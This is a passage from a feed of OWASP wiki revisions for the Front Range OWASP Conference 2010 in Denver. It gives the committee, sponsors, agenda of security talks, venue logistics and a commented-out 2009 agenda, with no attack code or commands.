|-&lt;br /&gt;
|8||jtevans||700||&lt;br /&gt;
|-&lt;br /&gt;
|9||igctf||700||&lt;br /&gt;
|-&lt;br /&gt;
|10||kdavis||700||&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Conference Committee====&lt;br /&gt;
&lt;br /&gt;
FROC 2010 Planning Committee Chair: Kathy Thaxton -  kthaxton at owasp dot org&lt;br /&gt;
&lt;br /&gt;
Presentation Selection Committee:&lt;br /&gt;
* Mark Bristow - OWASP Global Conference Committee&lt;br /&gt;
* David Campbell - OWASP Denver&lt;br /&gt;
* Eric Duprey - OWASP Denver&lt;br /&gt;
* Chris Hoff - Cloud Security Alliance&lt;br /&gt;
* Eoin Keary - Chair, OWASP Global Conference Committee&lt;br /&gt;
* Michael Sutton - Cloud Security Alliance&lt;br /&gt;
* Jim Reavis - Cloud Security Alliance&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Colorado Chapter Hosts:&lt;br /&gt;
* David Campbell - OWASP Denver - dcampbell at owasp dot org&lt;br /&gt;
* Eric Duprey - OWASP Denver - eduprey at owasp dot org&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Vendor Exhibition POC: Kathy Thaxton - kthaxton at owasp dot org&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Capture the Flag POC: Eric Duprey - eduprey at owasp dot org&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Conference Sponsors====&lt;br /&gt;
&lt;br /&gt;
[[File:Sponsors.PNG]]&lt;br /&gt;
&lt;br /&gt;
The following organizations are proud sponsors of this conference:&lt;br /&gt;
&amp;lt;!-- &lt;br /&gt;
*Accuvant&lt;br /&gt;
*Breach&lt;br /&gt;
*Business Partner Solutions&lt;br /&gt;
*Denim Group&lt;br /&gt;
*Fishnet Security&lt;br /&gt;
*IBM&lt;br /&gt;
*Imperva&lt;br /&gt;
*Laz&lt;br /&gt;
*Lares&lt;br /&gt;
*Trustwave&lt;br /&gt;
*WhiteHat Security --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
*[http://www.accuvant.com/ Accuvant]&lt;br /&gt;
*[http://www.denimgroup.com/ Denim Group]&lt;br /&gt;
*[http://www.fortify.com/ Fortify Software]&lt;br /&gt;
*[http://www.hosting.com/ Hosting.com]&lt;br /&gt;
*[http://www.whitehatsec.com/home/index.html Whitehat Security]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
If you are interested in sponsoring next year's Front Range OWASP Conference, please contact Kathy Thaxton at kthaxton at owasp dot org.&lt;br /&gt;
&lt;br /&gt;
Logistics information for sponsors is available [[FROC2010 Sponsor Info|here]]&lt;br /&gt;
&lt;br /&gt;
More information about conference sponsorship is available [[OWASP AppSec Conference Sponsors | here]].&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP AppSec Conference]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Twitter Feed====&lt;br /&gt;
{|&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;border: 1px solid rgb(204, 204, 204); width: 100%; font-size: 95%; color: rgb(0, 0, 0); background-color: rgb(236, 236, 236);&amp;quot; | &lt;br /&gt;
Use the '''[http://search.twitter.com/search?q=%23FROC #FROC]''' hashtag for your tweets (What are [http://hashtags.org/ hashtags]?) &lt;br /&gt;
&lt;br /&gt;
'''@OWASP303 Twitter Feed ([http://twitter.com/OWASP303 follow us on Twitter!])'''&lt;br /&gt;
&amp;lt;twitter&amp;gt;55021150&amp;lt;/twitter&amp;gt; &lt;br /&gt;
&lt;br /&gt;
| style=&amp;quot;width: 110px; font-size: 95%; color: rgb(0, 0, 0);&amp;quot; | &lt;br /&gt;
|} &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- &amp;lt;hr&amp;gt;&lt;br /&gt;
&amp;lt;paypal&amp;gt;Denver&amp;lt;/paypal&amp;gt; --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;headertabs /&amp;gt;&lt;/div&gt;</summary>
		<author><name>Eduprey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2010&amp;diff=84412</id>
		<title>Front Range OWASP Conference 2010</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2010&amp;diff=84412"/>
				<updated>2010-06-03T21:39:15Z</updated>
		
		<summary type="html">&lt;p&gt;Eduprey: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__NOTOC__ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- [http://froc2010.eventbrite.com/ Registration is NOW OPEN] --&amp;gt;&lt;br /&gt;
FROC2010 was a major success!  If you attended the event, please complete the [http://www.surveymonkey.com/s/FROC2010 Speaker Evaluation Survey]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;!-- Header --&amp;gt;&lt;br /&gt;
====Welcome====  &lt;br /&gt;
[[Image:Froc2010_sm.png|200px]]&lt;br /&gt;
'''Welcome to FROC 2010, the third annual Front Range OWASP Application Security Conference!'''&lt;br /&gt;
&lt;br /&gt;
After successful FROC's in June of 2008, and [http://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 March of 2009], we are back in Denver, Colorado USA on Wednesday the 2nd of June 2010! &lt;br /&gt;
&lt;br /&gt;
This year we again present a full day, multi-track event, which will provide valuable information for managers and executives as well as developers and engineers.&lt;br /&gt;
&lt;br /&gt;
In 2009, we attracted a packed venue with our great AppSec speakers, and we hope to achieve the same again in 2010.  This year we are organizing the conference with the support of our colleagues at the [http://www.cloudsecurityalliance.org/ Cloud Security Alliance], and will feature an AppSec track as well as a CloudSec/VirtSec track.&lt;br /&gt;
&lt;br /&gt;
====Registration====&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- [http://froc2010.eventbrite.com Registration is now open!] --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Due to the hard work of our organizers and the gracious support of our sponsors, FROC was a free event in 2008 and 2009.  This year, thanks to the generosity of our [http://www.owasp.org/index.php/Front_Range_OWASP_Conference_2010#tab=Conference_Sponsors sponsors] we are offering tickets to the event on a DONATION basis.  Pay whatever you or your company can afford.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- Click [http://froc2010.eventbrite.com HERE] to register now. --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Agenda====&lt;br /&gt;
&lt;br /&gt;
==Agenda and Presentations: 2 June 2010==&lt;br /&gt;
&lt;br /&gt;
The agenda follows the successful OWASP conference multi track format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;width:80%&amp;quot; border=&amp;quot;0&amp;quot; align=&amp;quot;center&amp;quot;&lt;br /&gt;
 ! colspan=&amp;quot;4&amp;quot; align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4058A0; color:white&amp;quot; | June 2, 2010&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 07:30-08:30 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Registration and Continental Breakfast in the Sponsor Expo Room&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:30-08:35 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Welcome to FROC 2010 Conference &lt;br /&gt;
''David Campbell, OWASP Denver''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:35-09:35 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Keynote: [[FROC2010_Abstract_Chess|&amp;quot;Watching Software Run: Software Security Beyond Defect Elimination&amp;quot;]]&lt;br /&gt;
''Brian Chess, Fortify Software''&lt;br /&gt;
&lt;br /&gt;
[https://docs.google.com/a/owasp.org/leaf?id=0B_-vbfka88vFNjMxYTcwY2ItNjgxNy00ZjMzLTkwMTUtN2IyMzA4MmE3OWVl&amp;amp;sort=name&amp;amp;layout=list&amp;amp;num=50 Presentation] [http://blip.tv/file/3710067 Video]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- [http://video.google.com/videoplay?docid=2875886330538461390 Video] --&amp;gt;&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 09:35-10:00 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | OWASP: State of the Union&lt;br /&gt;
''Tom Brennan, OWASP Board - [http://www.owasp.org/index.php/User:Brennan BIO]''&lt;br /&gt;
&lt;br /&gt;
[http://blip.tv/file/3710155 Video]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:00-10:20 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Cloud Security Alliance: State of the Union&lt;br /&gt;
''Randy Barr, Cloud Security Alliance''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:20-10:30 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break - Expo - CTF&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | || style=&amp;quot;width:22%; background:#BC857A&amp;quot; | '''AppSec/Technical Track: Room 1'''&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#BCA57A&amp;quot; | '''Cloud/Mobile/Emerging Track: Room 2'''&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#C6E2FF&amp;quot; | '''Management / Exec Track: Room 3'''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:30-11:15 || style=&amp;quot;width:22%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[FROC2010_Abstract_Grossman|2010: Web Hacking Odyssey - The Top Hacks of the Year]]&amp;quot;&lt;br /&gt;
''Jeremiah Grossman''&lt;br /&gt;
&lt;br /&gt;
[https://docs.google.com/fileview?id=0B_-vbfka88vFZTIwOWY3NjctZTY1OC00YTRjLThjNGUtMDIwZTk3MmVhN2Zi&amp;amp;hl=en Presentation] Video&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --&amp;gt;&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_McClellan|&amp;quot;Building a Secure, Compliant Cloud for the Enterprise&amp;quot;]]&lt;br /&gt;
''Matt Ferrari, Hosting.com''&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#C6E2FF&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Byrne|&amp;quot;Anatomy of a Logic Flaw&amp;quot;]]&lt;br /&gt;
''David Byrne and Charles Henderson, Trustwave''&lt;br /&gt;
&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 11:15-12:00 || style=&amp;quot;width:22%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[FROC2010_Abstract_Zusman|Advanced MITM Techniques for Security Testers]]&amp;quot;&lt;br /&gt;
''Mike Zusman, Raj Umadas and Aaron Rhodes, Intrepidus Group''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --&amp;gt;&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Nickerson|&amp;quot;YOU are the weakest link&amp;quot;]]&lt;br /&gt;
''Chris Nickerson, Lares Consulting''&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#C6E2FF&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Whaley|&amp;quot;Effectively marketing security as a win for both the business and the customer&amp;quot;]]&lt;br /&gt;
''Ben Whaley, Applied Trust Engineering and Jeff Smith, Rally Software''&lt;br /&gt;
&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 12:00-13:00 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Lunch - Expo - CTF&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:00-13:50 || style=&amp;quot;width:22%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[FROC2010_Abstract_Wheeler|Vulnerabilities in Secure Code: Now and Beyond]]&amp;quot;&lt;br /&gt;
''Alex Wheeler and Ryan Smith, Accuvant''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --&amp;gt;&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Roberts|&amp;quot;Real life CSI – Data Mining and Intelligence Gathering for the masses&amp;quot;]]&lt;br /&gt;
''Chris Roberts, Cyopsis''&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#C6E2FF&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Dickson|&amp;quot;The Permanent Campaign: Driving a Secure Software Initiative in the Enterprise&amp;quot;]]&lt;br /&gt;
''John Dickson, Denim Group''&lt;br /&gt;
&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:50-14:40 || style=&amp;quot;width:22%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[FROC2010_Abstract_Byrne2|Beware of Serialized GUI Objects Bearing Data]]&amp;quot;&lt;br /&gt;
''David Byrne and Rohini Sulatycki, Trustwave''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --&amp;gt;&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Zusman2|&amp;quot;What's Old Is New Again: An Overview of Mobile Application Security&amp;quot;]]&lt;br /&gt;
''Zach Lanier and Mike Zusman, Intrepidus Group''&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#C6E2FF&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Goldschmidt|&amp;quot;Fundamental Practices and Tools to implement a security development lifecycle&amp;quot;]]&lt;br /&gt;
''Cassio Goldschmidt, Symantec''&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 14:40-15:00 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | BREAK&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:00-15:50 || style=&amp;quot;width:22%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[FROC2010_Abstract_Schmidt|Solving Real-World Problems with an  Enterprise Security API]]&amp;quot;&lt;br /&gt;
''Chris Schmidt''&lt;br /&gt;
&lt;br /&gt;
[https://docs.google.com/fileview?id=0B_-vbfka88vFNjM5NzZmODQtZTQ1OS00NTYxLWJmOWQtNzE3OWY4OWZkOGMw&amp;amp;hl=en Presentation] Video&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --&amp;gt;&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Tucker|&amp;quot;Cloudy with a chance of hack&amp;quot;]]&lt;br /&gt;
''Lars Ewe, Cenzic''&lt;br /&gt;
&lt;br /&gt;
[https://docs.google.com/present/edit?id=0Af-vbfka88vFZGRrcjYycXZfMjUyZDQ3enN6ZmI&amp;amp;hl=en Presentation]&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#C6E2FF&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Cornell|&amp;quot;Application Security Program Management with Vulnerability Manager&amp;quot;]]&lt;br /&gt;
''Bryan Beverly, Denim Group''&lt;br /&gt;
&lt;br /&gt;
[https://docs.google.com/fileview?id=0B_-vbfka88vFNTY3OGUwMGItMmQyMi00YWRmLWJkMzgtMTZhNDNlZjJiNWJm&amp;amp;hl=en Presentation]&lt;br /&gt;
&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:50-16:30 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Panel Discussion: Topic TBD.  Moderator: John Dickson, Denim Group&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 16:30-17:30 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Wrap up, vendor raffles, CTF awards, FREE BEER!&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Logistics====&lt;br /&gt;
[[Image:Denver_mountains.JPG]]&lt;br /&gt;
&lt;br /&gt;
This year, the conference will again be held at University of Colorado, Denver.  However, instead of the Tivoli Student Union, this year the event will be hosted at the North Classroom building (Atrium UCD).&lt;br /&gt;
&lt;br /&gt;
[[File:Froc map.GIF|thumb|left]]&lt;br /&gt;
&lt;br /&gt;
[http://maps.google.com/maps?f=q&amp;amp;source=s_q&amp;amp;hl=en&amp;amp;geocode=&amp;amp;q=1200+Larimer+Street,+Denver,+CO&amp;amp;sll=37.0625,-95.677068&amp;amp;sspn=37.188995,62.226563&amp;amp;ie=UTF8&amp;amp;hq=&amp;amp;hnear=1200+Larimer+St,+Denver,+Colorado+80204&amp;amp;z=16&amp;amp;iwloc=A Google Map of the Venue: 1200 Larimer St., Denver CO 80204]&lt;br /&gt;
&lt;br /&gt;
=====Accomodation=====&lt;br /&gt;
OWASP has negotiated discounted rates with the uber-pimpin [http://www.hotelteatro.com/ Hotel Teatro].  Rooms under the FROC rate are $159/night and include courtesy Cadillac Escalade transportation to and from Auraria Campus. To reserve a room, contact Hotel Teatro at +1.303.228.1100 and mention FROC or use the [https://reservations.ihotelier.com/crs/g_reservation.cfm?groupID=464765&amp;amp;hotelID=14708 iHotelier.com link here].&lt;br /&gt;
&lt;br /&gt;
=====How to get to the venue?=====&lt;br /&gt;
&lt;br /&gt;
*By taxi: taxi from the airport to venue is about $50 USD&lt;br /&gt;
&lt;br /&gt;
*From hotel: transport from the conference hotel (Hotel Teatro) by limo is free&lt;br /&gt;
&lt;br /&gt;
*By car: there is plenty of parking at the UCD.  Attendees should park at the Tivoli lot (as in past years) and it is a short walk to the North Classroom buildings.  Parking validation will be provided for registered FROC participants.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- &lt;br /&gt;
====Call for Presentations====&lt;br /&gt;
The [[Front_Range_OWASP_Conference_2010_CFP|call for presentations]] closed 31 March 2010.  We are no longer accepting proposals for presentations.  If you have already submitted a presentation you can, however update your abstract or submit additional information to clarify your proposal. --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- ===[[SnowFROC Tentative Schedule]]=== --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- &lt;br /&gt;
====Agenda and Presentations: 5 March 2009====&lt;br /&gt;
&lt;br /&gt;
The agenda follows the successful OWASP conference two tracks format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;width:80%&amp;quot; border=&amp;quot;0&amp;quot; align=&amp;quot;center&amp;quot;&lt;br /&gt;
 ! colspan=&amp;quot;3&amp;quot; align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4058A0; color:white&amp;quot; | March 5, 2009&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 07:30-08:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Registration and Continental Breakfast in the Sponsor Expo Room&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:30-08:35 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Welcome to SnowFROC AppSec 2009 Conference &lt;br /&gt;
''David Campbell, OWASP Denver''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:35-09:45 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Keynote: [[SnowFROC_Abstract_Grossman|&amp;quot;Top Ten Web Hacking Techniques of 2008: What's possible, not probable&amp;quot;]]&lt;br /&gt;
''Jeremiah Grossman, Whitehat Security''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=2875886330538461390 Video]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 09:45-10:15 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | OWASP State of the Union&lt;br /&gt;
''Tom Brennan, OWASP Board''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:15-10:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | || style=&amp;quot;width:40%; background:#BC857A&amp;quot; | Management / Executive Track: Room 1&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; | Deep Technical Track: Room 2&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:30-11:15 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[sfroc_bellis_abstract|Doing More with Less: Automate or Die]]&amp;quot;&lt;br /&gt;
''Ed Bellis, Orbitz''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=-8396241750899139680 Video]&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Zusman|&amp;quot;Poor Man's Guide to Breaking PKI: Why You Don't Need 200 Playstations&amp;quot;]]&lt;br /&gt;
''Mike Zusman, Intrepidus Group''&lt;br /&gt;
&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 11:15-12:00 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Paller|&amp;quot;A Legal Minimum Standard of Due Care: The CAG and the Top 25 Most Dangerous Programming Errors&amp;quot;]]&lt;br /&gt;
''Alan Paller, SANS''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Stads|&amp;quot;Adobe Flex, AMF 3 and BlazeDS: An Assessment&amp;quot;]] &lt;br /&gt;
''Kevin Stadmeyer, Trustwave''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=1629208419122953007 Video]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 12:00-13:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Lunch - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | || style=&amp;quot;width:40%; background:#BC857A&amp;quot; | Management / Executive Track: Room 1&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; | Deep Technical Track: Room 2&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:00-13:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Peloquin|&amp;quot;Building an Effective Application Security Program&amp;quot;]]&lt;br /&gt;
''Joey Peloquin, Fishnet Security''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=-2540122072368010669 Video]&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Belani|&amp;quot;Bad Cocktail: Spear Phishing + Application Hacks&amp;quot;]]&lt;br /&gt;
''Rohyt Belani, Intrepidus Group''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=3127205451740977427 Video]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:50-14:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Byrne|&amp;quot;Automated vs. Manual Security: You can't filter The Stupid&amp;quot;]]&lt;br /&gt;
''David Byrne &amp;amp; Charles Henderson, Trustwave''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=7611144342490803641 Video]&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Damele|&amp;quot;SQL injection: Not only AND 1=1&amp;quot;]]&lt;br /&gt;
''Bernardo Damele Assumpcao Guimaraes, Portcullis Computer Security Ltd.''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=129190988572738701 Video]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 14:50-15:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] &lt;br /&gt;
|-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:00-15:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Neucom|&amp;quot;Security Policy Management: Best Practices for Web Services and Application Security&amp;quot;]]&lt;br /&gt;
''Ray Neucom, IBM''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=-4972597638535731442 Video]&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Cornell_Dickson_Abstract|&amp;quot;Vulnerability Management in an Application Security World&amp;quot;]]&lt;br /&gt;
''Dan Cornell &amp;amp; John Dickson, Denim Group''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=8588268474844052248 Video]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:50-16:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:40%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | Panel: Emerging Threats and Enterprise Countermeasures&lt;br /&gt;
Moderator: John Dickson&amp;lt;br/&amp;gt;&lt;br /&gt;
Panelists: Alan Paller, Joey Peloquin, Rohyt Belani, Ed Bellis, Laz, Ray Neucom&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 16:30-17:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:40%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | Conference Wrap Up, CTF Awards &amp;amp; Sponsor Raffles - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] &lt;br /&gt;
 |-&lt;br /&gt;
